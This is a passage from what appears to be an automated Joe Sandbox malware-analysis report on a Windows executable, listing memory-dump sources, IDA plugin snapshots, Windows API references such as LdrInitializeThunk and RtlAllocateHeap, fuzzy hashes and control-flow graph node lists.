                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 7c9f5834bcfee6b91b5b76e827f619e3bacee0e04013615221121cb3b12ee564
                                                                                • Instruction ID: 9b4aa23a035b2ebc126e039dc717b34dad8dfec119e7e0fb8cbd88a8ce9b3556
                                                                                • Opcode Fuzzy Hash: 7c9f5834bcfee6b91b5b76e827f619e3bacee0e04013615221121cb3b12ee564
                                                                                • Instruction Fuzzy Hash: 79710573B647054BC70CDEBAD89235BF6D6ABC8714F09D83EA888D7390EE789C054685

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 617 2f8770-2f8791 618 2f87a0-2f87fa 617->618 618->618 619 2f87fc-2f8808 618->619 620 2f880a-2f8812 619->620 621 2f8854-2f8868 619->621 622 2f8820-2f8827 620->622 623 2f8870-2f889c 621->623 625 2f8829-2f882c 622->625 626 2f8830-2f8836 622->626 623->623 624 2f889e-2f88a2 623->624 627 2f88a8-2f88cf call 30b7e0 624->627 628 2f8960-2f8962 624->628 625->622 629 2f882e 625->629 626->621 630 2f8838-2f884c call 30df70 626->630 636 2f88d0-2f892a 627->636 632 2f8c7e-2f8c87 628->632 629->621 635 2f8851 630->635 635->621 636->636 637 2f892c-2f8938 636->637 638 2f893a-2f8946 637->638 639 2f8967-2f896b 637->639 640 2f8950-2f8957 638->640 641 2f898c-2f8990 639->641 644 2f896d-2f8973 640->644 645 2f8959-2f895c 640->645 642 2f8996-2f899f 641->642 643 2f8c75-2f8c7b call 30b860 641->643 646 2f89a0-2f89ab 642->646 643->632 644->641 649 2f8975-2f8984 call 30df70 644->649 645->640 648 2f895e 645->648 646->646 650 2f89ad-2f89d5 646->650 648->641 655 2f8989 649->655 653 2f89de 650->653 654 2f89d7-2f89dc 650->654 656 2f89e0-2f89ee call 2d82b0 653->656 654->656 655->641 659 2f8a00-2f8a0a 656->659 660 2f8a0c-2f8a0f 659->660 661 2f89f0-2f89fe 659->661 663 2f8a10-2f8a1f 660->663 661->659 662 2f8a23-2f8a2a 661->662 665 2f8c6c-2f8c72 call 2d82c0 662->665 666 2f8a30-2f8a3b 662->666 663->663 664 2f8a21 663->664 664->661 665->643 667 2f8a3d-2f8a47 666->667 668 2f8a8b-2f8aa0 call 2d82b0 666->668 670 2f8a5c-2f8a60 667->670 679 2f8aa6-2f8aac 668->679 680 2f8c04-2f8c29 668->680 673 2f8a62-2f8a6b 670->673 674 2f8a50 670->674 677 2f8a6d-2f8a78 673->677 678 2f8a80-2f8a84 673->678 676 2f8a51-2f8a5a 674->676 676->668 676->670 677->676 678->676 681 2f8a86-2f8a89 678->681 679->680 682 2f8ab2-2f8abb 679->682 683 2f8c30-2f8c44 680->683 681->676 685 2f8ac0-2f8aca 682->685 683->683 684 2f8c46-2f8c69 call 2d9190 call 2d82c0 683->684 684->665 687 2f8acc-2f8ad1 685->687 688 2f8ae0-2f8ae5 685->688 692 2f8ba0-2f8ba6 687->692 689 2f8ae7-2f8aea 688->689 690 2f8b10-2f8b22 688->690 689->690 693 2f8aec-2f8b00 689->693 694 2f8bba-2f8bc3 690->694 695 2f8b28-2f8b2b 690->695 697 2f8ba8-2f8bae 692->697 693->692 701 2f8bcd-2f8bd0 694->701 702 2f8bc5-2f8bcb 694->702 695->694 698 2f8b31-2f8b99 695->698 697->680 700 2f8bb0-2f8bb2 697->700 698->692 700->685 703 2f8bb8 700->703 704 2f8bfc-2f8c02 701->704 705 2f8bd2-2f8bfa 701->705 702->697 703->680 704->692 705->692
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: =:;8
                                                                                • API String ID: 2994545307-508151936
                                                                                • Opcode ID: e4c881f35c798655f0b40e2245d0108cdaf6fdbad6c5d4574688905d62b60c08
                                                                                • Instruction ID: e2d551bd2017882f1d9fbdfeab445fe65ca3cabbd8f8bc9427fe2152270a7bb1
                                                                                • Opcode Fuzzy Hash: e4c881f35c798655f0b40e2245d0108cdaf6fdbad6c5d4574688905d62b60c08
                                                                                • Instruction Fuzzy Hash: 2FD16B72A683168BDB14CE24CC9237BF792EBC5384F19853DDA868B381DE749C16C791

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 706 2e9530-2e9551 707 2e9560-2e9569 706->707 707->707 708 2e956b-2e9573 707->708 709 2e9580-2e9589 708->709 709->709 710 2e958b-2e9597 709->710 711 2e9599-2e959e 710->711 712 2e95a0-2e95a2 710->712 713 2e95a9-2e95bb call 2d82b0 711->713 712->713 716 2e95bd-2e95c3 713->716 717 2e95e1-2e95f2 713->717 718 2e95d0-2e95df 716->718 719 2e95f4-2e95fa 717->719 720 2e9613 717->720 718->717 718->718 722 2e9600-2e960f 719->722 721 2e9616-2e9639 call 310480 720->721 726 2e9640-2e9652 721->726 722->722 723 2e9611 722->723 723->721 726->726 727 2e9654-2e965b 726->727 728 2e996c-2e997f call 2d82c0 727->728 729 2e96ca 727->729 730 2e974b-2e9762 call 3107b0 727->730 731 2e9729-2e9744 call 310480 727->731 732 2e9769-2e977e call 2d82b0 call 310880 727->732 733 2e9706-2e970e 727->733 734 2e98c7-2e98db 727->734 735 2e9662-2e9676 727->735 736 2e9982-2e998b 727->736 737 2e9980 727->737 738 2e9721 727->738 739 2e989f-2e98a9 call 2d82c0 727->739 740 2e96da-2e96ea call 309800 727->740 741 2e98b8-2e98bd call 2d82c0 727->741 742 2e9794-2e979f 727->742 743 2e9715-2e971a 727->743 744 2e96d2 727->744 745 2e98b2 727->745 746 2e96d0 727->746 747 2e96f0-2e96fd call 309800 727->747 728->737 729->746 730->728 730->732 730->734 730->736 730->737 730->739 730->741 730->742 730->745 731->728 731->730 731->732 731->734 731->736 731->737 731->738 731->739 731->741 731->742 731->745 774 2e9783-2e978d 732->774 733->728 733->730 733->731 733->732 733->734 733->736 733->737 733->738 733->739 733->741 733->742 733->743 733->745 750 2e98e0-2e98f4 734->750 752 2e9680-2e96b4 735->752 738->731 739->745 740->747 760 2e98c2-2e98c4 741->760 751 2e97a0-2e97a9 742->751 743->728 743->730 743->732 743->734 743->736 743->737 743->738 743->739 743->741 743->742 743->745 744->740 747->733 750->750 761 2e98f6-2e98fe 750->761 751->751 762 2e97ab-2e97b5 751->762 752->752 763 2e96b6-2e96c3 752->763 760->734 771 2e9937 761->771 772 2e9900-2e9911 761->772 773 2e97c0-2e97c9 762->773 763->728 763->729 763->730 763->731 763->732 763->733 763->734 763->736 763->737 763->738 763->739 763->740 763->741 763->742 763->743 763->744 763->745 763->746 763->747 778 2e9940-2e9946 771->778 775 2e9920-2e9927 772->775 773->773 776 2e97cb-2e97e3 773->776 774->728 774->734 774->736 774->737 774->739 774->741 774->742 774->745 777 2e9929-2e992c 775->777 775->778 779 2e97ec-2e97ef 776->779 780 2e97e5-2e97ea 776->780 777->775 781 2e992e 777->781 783 2e9948 778->783 784 2e9951-2e9963 call 30df70 778->784 782 2e97f6-2e9807 call 2d82b0 779->782 780->782 781->771 789 2e9809-2e980f 782->789 790 2e9821-2e9835 782->790 783->784 784->728 791 2e9810-2e981f 789->791 792 2e9837-2e983a 790->792 793 2e9851-2e985f 790->793 791->790 791->791 794 2e9840-2e984f 792->794 795 2e9881-2e9897 call 2d8fd0 793->795 796 2e9861-2e9864 793->796 794->793 794->794 795->739 797 2e9870-2e987f 796->797 797->795 797->797
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: efg`
                                                                                • API String ID: 0-115929991
                                                                                • Opcode ID: 24eac945c2228335dcf8bccf80c7ddd1c917afe9cfd6680be4996d124e05f53b
                                                                                • Instruction ID: ab3a661dca4104e342d9da45b268319e08569d9102dafa07c6df8f6ef10b4695
                                                                                • Opcode Fuzzy Hash: 24eac945c2228335dcf8bccf80c7ddd1c917afe9cfd6680be4996d124e05f53b
                                                                                • Instruction Fuzzy Hash: FBC125B1910215CBDB25CF59DC93AFB73B4FF4A310F598159E84297291EB30AD51CBA0
                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(0030BA46,?,00000010,00000005,00000000,?,00000000,?,?,002E9158,?,?,002E19B4), ref: 0030DF9E
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: efg`
                                                                                • API String ID: 2994545307-115929991
                                                                                • Opcode ID: 1d4bc9f3cdb5a8b3260abfaa22579a02a022d48a96dd5cdb3c8a3e583fea4824
                                                                                • Instruction ID: 489b37edce2c17dc727fef2e9f7abb323eea2ce008311931b272c5586ab72beb
                                                                                • Opcode Fuzzy Hash: 1d4bc9f3cdb5a8b3260abfaa22579a02a022d48a96dd5cdb3c8a3e583fea4824
                                                                                • Instruction Fuzzy Hash: 48514AB2A143504BD721EF509C427AF7393AFD5304F154429E94D5B342DF30AE228B93
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8c09962dc978d5c423df2f2a4c090bb606351bd5a4b6476131f0742a093753e1
                                                                                • Instruction ID: 2f0ac8e4fa26bf65163b06252ea4b55b96211c1f83abe07bb3ea99fe728977ef
                                                                                • Opcode Fuzzy Hash: 8c09962dc978d5c423df2f2a4c090bb606351bd5a4b6476131f0742a093753e1
                                                                                • Instruction Fuzzy Hash: 4C81F2716183018FD71ADF68D8506ABB7E2EF8D310F09883CEA95D7291E671DC85C782
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 38ac3d1423f230fff532a76c610adf90146bfcd8df0ead84a40064650a02542a
                                                                                • Instruction ID: 7354d9abbe695d965355e62153484e39f503ade8d47a62e333c75a28eae518df
                                                                                • Opcode Fuzzy Hash: 38ac3d1423f230fff532a76c610adf90146bfcd8df0ead84a40064650a02542a
                                                                                • Instruction Fuzzy Hash: C27126355083419BC71E9B28D85066FB7E6FFCD710F16C92CE4858B2A4D7B09C91C792
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 45867dd85b133ed27cd34c4c4d6fc3de29412a3b75b588259f81edbe324d1e45
                                                                                • Instruction ID: 820ff161ae83ddd7a6f8991491f1f0331cada7cce0c873d4d094fa4f7127a5fc
                                                                                • Opcode Fuzzy Hash: 45867dd85b133ed27cd34c4c4d6fc3de29412a3b75b588259f81edbe324d1e45
                                                                                • Instruction Fuzzy Hash: 46513A76A093108BD7229F29985166BF7E2EFD6720F2AC63CD9D567391D331DC028781
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b5b5b8146b0549ce5843476d6654986f71689bcb646dc90e4e59f3979e7c0205
                                                                                • Instruction ID: 37b56ce3943ebb1ad1feb1705df932b7a8932ce3a97d952c00d6997929cbf430
                                                                                • Opcode Fuzzy Hash: b5b5b8146b0549ce5843476d6654986f71689bcb646dc90e4e59f3979e7c0205
                                                                                • Instruction Fuzzy Hash: CB412A71A19344EFD3509F68AC42AAB77ECEB8E354F04883DFA49C3291D674D815CB52

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 800 30ded0-30dee3 801 30def8-30df05 800->801 802 30df49-30df52 call 30b860 800->802 803 30deea-30def1 800->803 804 30df3e-30df47 call 30b7e0 800->804 805 30df10-30df27 801->805 811 30df54 802->811 803->801 803->802 812 30df57-30df5a 804->812 805->805 808 30df29-30df3c RtlReAllocateHeap 805->808 808->811 811->812
                                                                                APIs
                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,00000000,00000000,00000001,?,00000000,00000000,002DB5FE,00000000,00000001), ref: 0030DF36
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 543f7293dd692a1cfe9a4a8087cdda224b282cdb13bee8d8b9ec4156443aea27
                                                                                • Instruction ID: d9bbf750e1933649cb54f96da7b0409f27f4c9b356cfcc1fea72db93587c7816
                                                                                • Opcode Fuzzy Hash: 543f7293dd692a1cfe9a4a8087cdda224b282cdb13bee8d8b9ec4156443aea27
                                                                                • Instruction Fuzzy Hash: 6D019E769092419BC31A1F20AC73AEB7B6CDFD7354F16403DE14387690C6384807C292
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0030B84E
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
